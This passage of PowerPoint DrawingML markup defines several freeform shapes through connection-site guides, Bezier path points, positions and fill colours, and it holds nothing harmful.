                <a:gd name="connsiteY11" fmla="*/ 154890 h 1730535"/>
                <a:gd name="connsiteX12" fmla="*/ 651857 w 2664782"/>
                <a:gd name="connsiteY12" fmla="*/ 278823 h 1730535"/>
                <a:gd name="connsiteX13" fmla="*/ 512929 w 2664782"/>
                <a:gd name="connsiteY13" fmla="*/ 484788 h 1730535"/>
                <a:gd name="connsiteX14" fmla="*/ 370915 w 2664782"/>
                <a:gd name="connsiteY14" fmla="*/ 772787 h 1730535"/>
                <a:gd name="connsiteX15" fmla="*/ 292851 w 2664782"/>
                <a:gd name="connsiteY15" fmla="*/ 962434 h 1730535"/>
                <a:gd name="connsiteX16" fmla="*/ 181267 w 2664782"/>
                <a:gd name="connsiteY16" fmla="*/ 1267634 h 1730535"/>
                <a:gd name="connsiteX17" fmla="*/ 116876 w 2664782"/>
                <a:gd name="connsiteY17" fmla="*/ 1464337 h 1730535"/>
                <a:gd name="connsiteX18" fmla="*/ 38812 w 2664782"/>
                <a:gd name="connsiteY18" fmla="*/ 1708232 h 1730535"/>
                <a:gd name="connsiteX19" fmla="*/ 31755 w 2664782"/>
                <a:gd name="connsiteY19" fmla="*/ 1724992 h 1730535"/>
                <a:gd name="connsiteX20" fmla="*/ 0 w 2664782"/>
                <a:gd name="connsiteY20" fmla="*/ 1713966 h 1730535"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 2677238"/>
                <a:gd name="connsiteY0" fmla="*/ 1713966 h 1730535"/>
                <a:gd name="connsiteX1" fmla="*/ 348863 w 2677238"/>
                <a:gd name="connsiteY1" fmla="*/ 743237 h 1730535"/>
                <a:gd name="connsiteX2" fmla="*/ 534540 w 2677238"/>
                <a:gd name="connsiteY2" fmla="*/ 382026 h 1730535"/>
                <a:gd name="connsiteX3" fmla="*/ 830478 w 2677238"/>
                <a:gd name="connsiteY3" fmla="*/ 82119 h 1730535"/>
                <a:gd name="connsiteX4" fmla="*/ 1345613 w 2677238"/>
                <a:gd name="connsiteY4" fmla="*/ 23019 h 1730535"/>
                <a:gd name="connsiteX5" fmla="*/ 1654781 w 2677238"/>
                <a:gd name="connsiteY5" fmla="*/ 120048 h 1730535"/>
                <a:gd name="connsiteX6" fmla="*/ 2315930 w 2677238"/>
                <a:gd name="connsiteY6" fmla="*/ 403451 h 1730535"/>
                <a:gd name="connsiteX7" fmla="*/ 2664146 w 2677238"/>
                <a:gd name="connsiteY7" fmla="*/ 560842 h 1730535"/>
                <a:gd name="connsiteX8" fmla="*/ 1695357 w 2677238"/>
                <a:gd name="connsiteY8" fmla="*/ 178706 h 1730535"/>
                <a:gd name="connsiteX9" fmla="*/ 1326207 w 2677238"/>
                <a:gd name="connsiteY9" fmla="*/ 54333 h 1730535"/>
                <a:gd name="connsiteX10" fmla="*/ 926184 w 2677238"/>
                <a:gd name="connsiteY10" fmla="*/ 70652 h 1730535"/>
                <a:gd name="connsiteX11" fmla="*/ 776671 w 2677238"/>
                <a:gd name="connsiteY11" fmla="*/ 154890 h 1730535"/>
                <a:gd name="connsiteX12" fmla="*/ 651857 w 2677238"/>
                <a:gd name="connsiteY12" fmla="*/ 278823 h 1730535"/>
                <a:gd name="connsiteX13" fmla="*/ 512929 w 2677238"/>
                <a:gd name="connsiteY13" fmla="*/ 484788 h 1730535"/>
                <a:gd name="connsiteX14" fmla="*/ 370915 w 2677238"/>
                <a:gd name="connsiteY14" fmla="*/ 772787 h 1730535"/>
                <a:gd name="connsiteX15" fmla="*/ 292851 w 2677238"/>
                <a:gd name="connsiteY15" fmla="*/ 962434 h 1730535"/>
                <a:gd name="connsiteX16" fmla="*/ 181267 w 2677238"/>
                <a:gd name="connsiteY16" fmla="*/ 1267634 h 1730535"/>
                <a:gd name="connsiteX17" fmla="*/ 116876 w 2677238"/>
                <a:gd name="connsiteY17" fmla="*/ 1464337 h 1730535"/>
                <a:gd name="connsiteX18" fmla="*/ 38812 w 2677238"/>
                <a:gd name="connsiteY18" fmla="*/ 1708232 h 1730535"/>
                <a:gd name="connsiteX19" fmla="*/ 31755 w 2677238"/>
                <a:gd name="connsiteY19" fmla="*/ 1724992 h 1730535"/>
                <a:gd name="connsiteX20" fmla="*/ 0 w 2677238"/>
                <a:gd name="connsiteY20" fmla="*/ 1713966 h 1730535"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 2746749"/>
                <a:gd name="connsiteY0" fmla="*/ 1713966 h 1730535"/>
                <a:gd name="connsiteX1" fmla="*/ 348863 w 2746749"/>
                <a:gd name="connsiteY1" fmla="*/ 743237 h 1730535"/>
                <a:gd name="connsiteX2" fmla="*/ 534540 w 2746749"/>
                <a:gd name="connsiteY2" fmla="*/ 382026 h 1730535"/>
                <a:gd name="connsiteX3" fmla="*/ 830478 w 2746749"/>
                <a:gd name="connsiteY3" fmla="*/ 82119 h 1730535"/>
                <a:gd name="connsiteX4" fmla="*/ 1345613 w 2746749"/>
                <a:gd name="connsiteY4" fmla="*/ 23019 h 1730535"/>
                <a:gd name="connsiteX5" fmla="*/ 1654781 w 2746749"/>
                <a:gd name="connsiteY5" fmla="*/ 120048 h 1730535"/>
                <a:gd name="connsiteX6" fmla="*/ 2684763 w 2746749"/>
                <a:gd name="connsiteY6" fmla="*/ 544757 h 1730535"/>
                <a:gd name="connsiteX7" fmla="*/ 2664146 w 2746749"/>
                <a:gd name="connsiteY7" fmla="*/ 560842 h 1730535"/>
                <a:gd name="connsiteX8" fmla="*/ 1695357 w 2746749"/>
                <a:gd name="connsiteY8" fmla="*/ 178706 h 1730535"/>
                <a:gd name="connsiteX9" fmla="*/ 1326207 w 2746749"/>
                <a:gd name="connsiteY9" fmla="*/ 54333 h 1730535"/>
                <a:gd name="connsiteX10" fmla="*/ 926184 w 2746749"/>
                <a:gd name="connsiteY10" fmla="*/ 70652 h 1730535"/>
                <a:gd name="connsiteX11" fmla="*/ 776671 w 2746749"/>
                <a:gd name="connsiteY11" fmla="*/ 154890 h 1730535"/>
                <a:gd name="connsiteX12" fmla="*/ 651857 w 2746749"/>
                <a:gd name="connsiteY12" fmla="*/ 278823 h 1730535"/>
                <a:gd name="connsiteX13" fmla="*/ 512929 w 2746749"/>
                <a:gd name="connsiteY13" fmla="*/ 484788 h 1730535"/>
                <a:gd name="connsiteX14" fmla="*/ 370915 w 2746749"/>
                <a:gd name="connsiteY14" fmla="*/ 772787 h 1730535"/>
                <a:gd name="connsiteX15" fmla="*/ 292851 w 2746749"/>
                <a:gd name="connsiteY15" fmla="*/ 962434 h 1730535"/>
                <a:gd name="connsiteX16" fmla="*/ 181267 w 2746749"/>
                <a:gd name="connsiteY16" fmla="*/ 1267634 h 1730535"/>
                <a:gd name="connsiteX17" fmla="*/ 116876 w 2746749"/>
                <a:gd name="connsiteY17" fmla="*/ 1464337 h 1730535"/>
                <a:gd name="connsiteX18" fmla="*/ 38812 w 2746749"/>
                <a:gd name="connsiteY18" fmla="*/ 1708232 h 1730535"/>
                <a:gd name="connsiteX19" fmla="*/ 31755 w 2746749"/>
                <a:gd name="connsiteY19" fmla="*/ 1724992 h 1730535"/>
                <a:gd name="connsiteX20" fmla="*/ 0 w 2746749"/>
                <a:gd name="connsiteY20" fmla="*/ 1713966 h 1730535"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 2709624"/>
                <a:gd name="connsiteY0" fmla="*/ 1713966 h 1730535"/>
                <a:gd name="connsiteX1" fmla="*/ 348863 w 2709624"/>
                <a:gd name="connsiteY1" fmla="*/ 743237 h 1730535"/>
                <a:gd name="connsiteX2" fmla="*/ 534540 w 2709624"/>
                <a:gd name="connsiteY2" fmla="*/ 382026 h 1730535"/>
                <a:gd name="connsiteX3" fmla="*/ 830478 w 2709624"/>
                <a:gd name="connsiteY3" fmla="*/ 82119 h 1730535"/>
                <a:gd name="connsiteX4" fmla="*/ 1345613 w 2709624"/>
                <a:gd name="connsiteY4" fmla="*/ 23019 h 1730535"/>
                <a:gd name="connsiteX5" fmla="*/ 1654781 w 2709624"/>
                <a:gd name="connsiteY5" fmla="*/ 120048 h 1730535"/>
                <a:gd name="connsiteX6" fmla="*/ 2684763 w 2709624"/>
                <a:gd name="connsiteY6" fmla="*/ 544757 h 1730535"/>
                <a:gd name="connsiteX7" fmla="*/ 2664146 w 2709624"/>
                <a:gd name="connsiteY7" fmla="*/ 560842 h 1730535"/>
                <a:gd name="connsiteX8" fmla="*/ 1695357 w 2709624"/>
                <a:gd name="connsiteY8" fmla="*/ 178706 h 1730535"/>
                <a:gd name="connsiteX9" fmla="*/ 1326207 w 2709624"/>
                <a:gd name="connsiteY9" fmla="*/ 54333 h 1730535"/>
                <a:gd name="connsiteX10" fmla="*/ 926184 w 2709624"/>
                <a:gd name="connsiteY10" fmla="*/ 70652 h 1730535"/>
                <a:gd name="connsiteX11" fmla="*/ 776671 w 2709624"/>
                <a:gd name="connsiteY11" fmla="*/ 154890 h 1730535"/>
                <a:gd name="connsiteX12" fmla="*/ 651857 w 2709624"/>
                <a:gd name="connsiteY12" fmla="*/ 278823 h 1730535"/>
                <a:gd name="connsiteX13" fmla="*/ 512929 w 2709624"/>
                <a:gd name="connsiteY13" fmla="*/ 484788 h 1730535"/>
                <a:gd name="connsiteX14" fmla="*/ 370915 w 2709624"/>
                <a:gd name="connsiteY14" fmla="*/ 772787 h 1730535"/>
                <a:gd name="connsiteX15" fmla="*/ 292851 w 2709624"/>
                <a:gd name="connsiteY15" fmla="*/ 962434 h 1730535"/>
                <a:gd name="connsiteX16" fmla="*/ 181267 w 2709624"/>
                <a:gd name="connsiteY16" fmla="*/ 1267634 h 1730535"/>
                <a:gd name="connsiteX17" fmla="*/ 116876 w 2709624"/>
                <a:gd name="connsiteY17" fmla="*/ 1464337 h 1730535"/>
                <a:gd name="connsiteX18" fmla="*/ 38812 w 2709624"/>
                <a:gd name="connsiteY18" fmla="*/ 1708232 h 1730535"/>
                <a:gd name="connsiteX19" fmla="*/ 31755 w 2709624"/>
                <a:gd name="connsiteY19" fmla="*/ 1724992 h 1730535"/>
                <a:gd name="connsiteX20" fmla="*/ 0 w 2709624"/>
                <a:gd name="connsiteY20" fmla="*/ 1713966 h 1730535"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 2703098"/>
                <a:gd name="connsiteY0" fmla="*/ 1713966 h 1730535"/>
                <a:gd name="connsiteX1" fmla="*/ 348863 w 2703098"/>
                <a:gd name="connsiteY1" fmla="*/ 743237 h 1730535"/>
                <a:gd name="connsiteX2" fmla="*/ 534540 w 2703098"/>
                <a:gd name="connsiteY2" fmla="*/ 382026 h 1730535"/>
                <a:gd name="connsiteX3" fmla="*/ 830478 w 2703098"/>
                <a:gd name="connsiteY3" fmla="*/ 82119 h 1730535"/>
                <a:gd name="connsiteX4" fmla="*/ 1345613 w 2703098"/>
                <a:gd name="connsiteY4" fmla="*/ 23019 h 1730535"/>
                <a:gd name="connsiteX5" fmla="*/ 1654781 w 2703098"/>
                <a:gd name="connsiteY5" fmla="*/ 120048 h 1730535"/>
                <a:gd name="connsiteX6" fmla="*/ 2684763 w 2703098"/>
                <a:gd name="connsiteY6" fmla="*/ 544757 h 1730535"/>
                <a:gd name="connsiteX7" fmla="*/ 2652170 w 2703098"/>
                <a:gd name="connsiteY7" fmla="*/ 591978 h 1730535"/>
                <a:gd name="connsiteX8" fmla="*/ 1695357 w 2703098"/>
                <a:gd name="connsiteY8" fmla="*/ 178706 h 1730535"/>
                <a:gd name="connsiteX9" fmla="*/ 1326207 w 2703098"/>
                <a:gd name="connsiteY9" fmla="*/ 54333 h 1730535"/>
                <a:gd name="connsiteX10" fmla="*/ 926184 w 2703098"/>
                <a:gd name="connsiteY10" fmla="*/ 70652 h 1730535"/>
                <a:gd name="connsiteX11" fmla="*/ 776671 w 2703098"/>
                <a:gd name="connsiteY11" fmla="*/ 154890 h 1730535"/>
                <a:gd name="connsiteX12" fmla="*/ 651857 w 2703098"/>
                <a:gd name="connsiteY12" fmla="*/ 278823 h 1730535"/>
                <a:gd name="connsiteX13" fmla="*/ 512929 w 2703098"/>
                <a:gd name="connsiteY13" fmla="*/ 484788 h 1730535"/>
                <a:gd name="connsiteX14" fmla="*/ 370915 w 2703098"/>
                <a:gd name="connsiteY14" fmla="*/ 772787 h 1730535"/>
                <a:gd name="connsiteX15" fmla="*/ 292851 w 2703098"/>
                <a:gd name="connsiteY15" fmla="*/ 962434 h 1730535"/>
                <a:gd name="connsiteX16" fmla="*/ 181267 w 2703098"/>
                <a:gd name="connsiteY16" fmla="*/ 1267634 h 1730535"/>
                <a:gd name="connsiteX17" fmla="*/ 116876 w 2703098"/>
                <a:gd name="connsiteY17" fmla="*/ 1464337 h 1730535"/>
                <a:gd name="connsiteX18" fmla="*/ 38812 w 2703098"/>
                <a:gd name="connsiteY18" fmla="*/ 1708232 h 1730535"/>
                <a:gd name="connsiteX19" fmla="*/ 31755 w 2703098"/>
                <a:gd name="connsiteY19" fmla="*/ 1724992 h 1730535"/>
                <a:gd name="connsiteX20" fmla="*/ 0 w 2703098"/>
                <a:gd name="connsiteY20" fmla="*/ 1713966 h 1730535"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 2732024"/>
                <a:gd name="connsiteY0" fmla="*/ 1713966 h 1730535"/>
                <a:gd name="connsiteX1" fmla="*/ 348863 w 2732024"/>
                <a:gd name="connsiteY1" fmla="*/ 743237 h 1730535"/>
                <a:gd name="connsiteX2" fmla="*/ 534540 w 2732024"/>
                <a:gd name="connsiteY2" fmla="*/ 382026 h 1730535"/>
                <a:gd name="connsiteX3" fmla="*/ 830478 w 2732024"/>
                <a:gd name="connsiteY3" fmla="*/ 82119 h 1730535"/>
                <a:gd name="connsiteX4" fmla="*/ 1345613 w 2732024"/>
                <a:gd name="connsiteY4" fmla="*/ 23019 h 1730535"/>
                <a:gd name="connsiteX5" fmla="*/ 1654781 w 2732024"/>
                <a:gd name="connsiteY5" fmla="*/ 120048 h 1730535"/>
                <a:gd name="connsiteX6" fmla="*/ 2667998 w 2732024"/>
                <a:gd name="connsiteY6" fmla="*/ 568707 h 1730535"/>
                <a:gd name="connsiteX7" fmla="*/ 2652170 w 2732024"/>
                <a:gd name="connsiteY7" fmla="*/ 591978 h 1730535"/>
                <a:gd name="connsiteX8" fmla="*/ 1695357 w 2732024"/>
                <a:gd name="connsiteY8" fmla="*/ 178706 h 1730535"/>
                <a:gd name="connsiteX9" fmla="*/ 1326207 w 2732024"/>
                <a:gd name="connsiteY9" fmla="*/ 54333 h 1730535"/>
                <a:gd name="connsiteX10" fmla="*/ 926184 w 2732024"/>
                <a:gd name="connsiteY10" fmla="*/ 70652 h 1730535"/>
                <a:gd name="connsiteX11" fmla="*/ 776671 w 2732024"/>
                <a:gd name="connsiteY11" fmla="*/ 154890 h 1730535"/>
                <a:gd name="connsiteX12" fmla="*/ 651857 w 2732024"/>
                <a:gd name="connsiteY12" fmla="*/ 278823 h 1730535"/>
                <a:gd name="connsiteX13" fmla="*/ 512929 w 2732024"/>
                <a:gd name="connsiteY13" fmla="*/ 484788 h 1730535"/>
                <a:gd name="connsiteX14" fmla="*/ 370915 w 2732024"/>
                <a:gd name="connsiteY14" fmla="*/ 772787 h 1730535"/>
                <a:gd name="connsiteX15" fmla="*/ 292851 w 2732024"/>
                <a:gd name="connsiteY15" fmla="*/ 962434 h 1730535"/>
                <a:gd name="connsiteX16" fmla="*/ 181267 w 2732024"/>
                <a:gd name="connsiteY16" fmla="*/ 1267634 h 1730535"/>
                <a:gd name="connsiteX17" fmla="*/ 116876 w 2732024"/>
                <a:gd name="connsiteY17" fmla="*/ 1464337 h 1730535"/>
                <a:gd name="connsiteX18" fmla="*/ 38812 w 2732024"/>
                <a:gd name="connsiteY18" fmla="*/ 1708232 h 1730535"/>
                <a:gd name="connsiteX19" fmla="*/ 31755 w 2732024"/>
                <a:gd name="connsiteY19" fmla="*/ 1724992 h 1730535"/>
                <a:gd name="connsiteX20" fmla="*/ 0 w 2732024"/>
                <a:gd name="connsiteY20" fmla="*/ 1713966 h 1730535"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 2685693"/>
                <a:gd name="connsiteY0" fmla="*/ 1713966 h 1730535"/>
                <a:gd name="connsiteX1" fmla="*/ 348863 w 2685693"/>
                <a:gd name="connsiteY1" fmla="*/ 743237 h 1730535"/>
                <a:gd name="connsiteX2" fmla="*/ 534540 w 2685693"/>
                <a:gd name="connsiteY2" fmla="*/ 382026 h 1730535"/>
                <a:gd name="connsiteX3" fmla="*/ 830478 w 2685693"/>
                <a:gd name="connsiteY3" fmla="*/ 82119 h 1730535"/>
                <a:gd name="connsiteX4" fmla="*/ 1345613 w 2685693"/>
                <a:gd name="connsiteY4" fmla="*/ 23019 h 1730535"/>
                <a:gd name="connsiteX5" fmla="*/ 1654781 w 2685693"/>
                <a:gd name="connsiteY5" fmla="*/ 120048 h 1730535"/>
                <a:gd name="connsiteX6" fmla="*/ 2667998 w 2685693"/>
                <a:gd name="connsiteY6" fmla="*/ 568707 h 1730535"/>
                <a:gd name="connsiteX7" fmla="*/ 2652170 w 2685693"/>
                <a:gd name="connsiteY7" fmla="*/ 591978 h 1730535"/>
                <a:gd name="connsiteX8" fmla="*/ 1695357 w 2685693"/>
                <a:gd name="connsiteY8" fmla="*/ 178706 h 1730535"/>
                <a:gd name="connsiteX9" fmla="*/ 1326207 w 2685693"/>
                <a:gd name="connsiteY9" fmla="*/ 54333 h 1730535"/>
                <a:gd name="connsiteX10" fmla="*/ 926184 w 2685693"/>
                <a:gd name="connsiteY10" fmla="*/ 70652 h 1730535"/>
                <a:gd name="connsiteX11" fmla="*/ 776671 w 2685693"/>
                <a:gd name="connsiteY11" fmla="*/ 154890 h 1730535"/>
                <a:gd name="connsiteX12" fmla="*/ 651857 w 2685693"/>
                <a:gd name="connsiteY12" fmla="*/ 278823 h 1730535"/>
                <a:gd name="connsiteX13" fmla="*/ 512929 w 2685693"/>
                <a:gd name="connsiteY13" fmla="*/ 484788 h 1730535"/>
                <a:gd name="connsiteX14" fmla="*/ 370915 w 2685693"/>
                <a:gd name="connsiteY14" fmla="*/ 772787 h 1730535"/>
                <a:gd name="connsiteX15" fmla="*/ 292851 w 2685693"/>
                <a:gd name="connsiteY15" fmla="*/ 962434 h 1730535"/>
                <a:gd name="connsiteX16" fmla="*/ 181267 w 2685693"/>
                <a:gd name="connsiteY16" fmla="*/ 1267634 h 1730535"/>
                <a:gd name="connsiteX17" fmla="*/ 116876 w 2685693"/>
                <a:gd name="connsiteY17" fmla="*/ 1464337 h 1730535"/>
                <a:gd name="connsiteX18" fmla="*/ 38812 w 2685693"/>
                <a:gd name="connsiteY18" fmla="*/ 1708232 h 1730535"/>
                <a:gd name="connsiteX19" fmla="*/ 31755 w 2685693"/>
                <a:gd name="connsiteY19" fmla="*/ 1724992 h 1730535"/>
                <a:gd name="connsiteX20" fmla="*/ 0 w 2685693"/>
                <a:gd name="connsiteY20" fmla="*/ 1713966 h 173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85693" h="1730535">
                  <a:moveTo>
                    <a:pt x="0" y="1713966"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="106291" y="1386273"/>
                    <a:pt x="209053" y="1059022"/>
                    <a:pt x="348863" y="743237"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="403551" y="619746"/>
                    <a:pt x="456917" y="492727"/>
                    <a:pt x="534540" y="382026"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="615251" y="266473"/>
                    <a:pt x="707869" y="155331"/>
                    <a:pt x="830478" y="82119"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="984842" y="-9176"/>
                    <a:pt x="1174048" y="-17115"/>
                    <a:pt x="1345613" y="23019"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1451021" y="47718"/>
                    <a:pt x="1434384" y="29100"/>
                    <a:pt x="1654781" y="120048"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1875179" y="210996"/>
                    <a:pt x="2664028" y="561650"/>
                    <a:pt x="2667998" y="568707"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2681670" y="576204"/>
                    <a:pt x="2706501" y="616262"/>
                    <a:pt x="2652170" y="591978"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2492720" y="520709"/>
                    <a:pt x="2014295" y="316463"/>
                    <a:pt x="1695357" y="178706"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1474363" y="89099"/>
                    <a:pt x="1454990" y="81237"/>
                    <a:pt x="1326207" y="54333"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1193454" y="26548"/>
                    <a:pt x="1055408" y="25666"/>
                    <a:pt x="926184" y="70652"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="871936" y="89616"/>
                    <a:pt x="822098" y="118725"/>
                    <a:pt x="776671" y="154890"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="730362" y="191497"/>
                    <a:pt x="688904" y="232954"/>
                    <a:pt x="651857" y="278823"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="599814" y="343214"/>
                    <a:pt x="553505" y="412017"/>
                    <a:pt x="512929" y="484788"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="460446" y="578289"/>
                    <a:pt x="413254" y="674435"/>
                    <a:pt x="370915" y="772787"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="344011" y="835856"/>
                    <a:pt x="318431" y="898924"/>
                    <a:pt x="292851" y="962434"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="252716" y="1062991"/>
                    <a:pt x="217433" y="1165754"/>
                    <a:pt x="181267" y="1267634"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="158333" y="1332467"/>
                    <a:pt x="138046" y="1398623"/>
                    <a:pt x="116876" y="1464337"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="90854" y="1545489"/>
                    <a:pt x="63951" y="1626640"/>
                    <a:pt x="38812" y="1708232"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37047" y="1713966"/>
                    <a:pt x="34842" y="1719700"/>
                    <a:pt x="31755" y="1724992"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17201" y="1734695"/>
                    <a:pt x="9703" y="1732049"/>
                    <a:pt x="0" y="1713966"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="030303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284A768-ED3B-4C6C-A339-8F6E0CF72975}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4909570" y="3106205"/>
              <a:ext cx="255492" cy="2487454"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 173777 w 186137"/>
                <a:gd name="connsiteY0" fmla="*/ 2629479 h 2638532"/>
                <a:gd name="connsiteX1" fmla="*/ 8 w 186137"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 2638532"/>
                <a:gd name="connsiteX2" fmla="*/ 14121 w 186137"/>
                <a:gd name="connsiteY2" fmla="*/ 1764 h 2638532"/>
                <a:gd name="connsiteX3" fmla="*/ 186126 w 186137"/>
                <a:gd name="connsiteY3" fmla="*/ 2629038 h 2638532"/>
                <a:gd name="connsiteX4" fmla="*/ 173777 w 186137"/>
                <a:gd name="connsiteY4" fmla="*/ 2629479 h 263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37" h="2638532">
                  <a:moveTo>
                    <a:pt x="173777" y="2629479"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="172454" y="2615366"/>
                    <a:pt x="-1316" y="11908"/>
                    <a:pt x="8" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4859" y="1323"/>
                    <a:pt x="9270" y="441"/>
                    <a:pt x="14121" y="1764"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12357" y="26903"/>
                    <a:pt x="186126" y="2618012"/>
                    <a:pt x="186126" y="2629038"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="186567" y="2640946"/>
                    <a:pt x="174218" y="2642270"/>
                    <a:pt x="173777" y="2629479"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="8D8D8D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17DBC9F-A03B-4A11-A97D-3DBC8D48076B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1024137" y="3535246"/>
              <a:ext cx="253243" cy="105794"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 195467 w 253243"/>
                <a:gd name="connsiteY0" fmla="*/ 196 h 105794"/>
                <a:gd name="connsiteX1" fmla="*/ 220606 w 253243"/>
                <a:gd name="connsiteY1" fmla="*/ 196 h 105794"/>
                <a:gd name="connsiteX2" fmla="*/ 253243 w 253243"/>
                <a:gd name="connsiteY2" fmla="*/ 34156 h 105794"/>
                <a:gd name="connsiteX3" fmla="*/ 252802 w 253243"/>
                <a:gd name="connsiteY3" fmla="*/ 46946 h 105794"/>
                <a:gd name="connsiteX4" fmla="*/ 210021 w 253243"/>
                <a:gd name="connsiteY4" fmla="*/ 79583 h 105794"/>
                <a:gd name="connsiteX5" fmla="*/ 76386 w 253243"/>
                <a:gd name="connsiteY5" fmla="*/ 92373 h 105794"/>
                <a:gd name="connsiteX6" fmla="*/ 29195 w 253243"/>
                <a:gd name="connsiteY6" fmla="*/ 105163 h 105794"/>
                <a:gd name="connsiteX7" fmla="*/ 527 w 253243"/>
                <a:gd name="connsiteY7" fmla="*/ 75614 h 105794"/>
                <a:gd name="connsiteX8" fmla="*/ 46837 w 253243"/>
                <a:gd name="connsiteY8" fmla="*/ 24894 h 105794"/>
                <a:gd name="connsiteX9" fmla="*/ 195467 w 253243"/>
                <a:gd name="connsiteY9" fmla="*/ 196 h 10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243" h="105794">
                  <a:moveTo>
                    <a:pt x="195467" y="196"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="207375" y="196"/>
                    <a:pt x="213991" y="-245"/>
                    <a:pt x="220606" y="196"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="240894" y="1519"/>
                    <a:pt x="252361" y="13868"/>
                    <a:pt x="253243" y="34156"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="253243" y="38566"/>
                    <a:pt x="253243" y="42536"/>
                    <a:pt x="252802" y="46946"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="249715" y="79583"/>
                    <a:pt x="240894" y="89727"/>
                    <a:pt x="210021" y="79583"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="162389" y="63706"/>
                    <a:pt x="119608" y="76496"/>
                    <a:pt x="76386" y="92373"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="60950" y="98107"/>
                    <a:pt x="45072" y="102517"/>
                    <a:pt x="29195" y="105163"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8025" y="108692"/>
                    <a:pt x="-2560" y="97225"/>
                    <a:pt x="527" y="75614"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4938" y="48710"/>
                    <a:pt x="22138" y="32833"/>
                    <a:pt x="46837" y="24894"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="97115" y="8576"/>
                    <a:pt x="148717" y="3724"/>
                    <a:pt x="195467" y="196"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="DEB4B2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F581B23-94A0-45D0-907D-36848DBBC783}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1197993" y="3561560"/>
              <a:ext cx="56894" cy="36706"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 56894 w 56894"/>
                <a:gd name="connsiteY0" fmla="*/ 8725 h 36706"/>
                <a:gd name="connsiteX1" fmla="*/ 31755 w 56894"/>
                <a:gd name="connsiteY1" fmla="*/ 5637 h 36706"/>
                <a:gd name="connsiteX2" fmla="*/ 35724 w 56894"/>
                <a:gd name="connsiteY2" fmla="*/ 32100 h 36706"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 56894"/>
                <a:gd name="connsiteY3" fmla="*/ 29454 h 36706"/>
                <a:gd name="connsiteX4" fmla="*/ 18083 w 56894"/>
                <a:gd name="connsiteY4" fmla="*/ 32100 h 36706"/>
                <a:gd name="connsiteX5" fmla="*/ 19406 w 56894"/>
                <a:gd name="connsiteY5" fmla="*/ 6961 h 36706"/>
                <a:gd name="connsiteX6" fmla="*/ 56894 w 56894"/>
                <a:gd name="connsiteY6" fmla="*/ 8725 h 3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94" h="36706">
                  <a:moveTo>
                    <a:pt x="56894" y="8725"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="49838" y="5196"/>
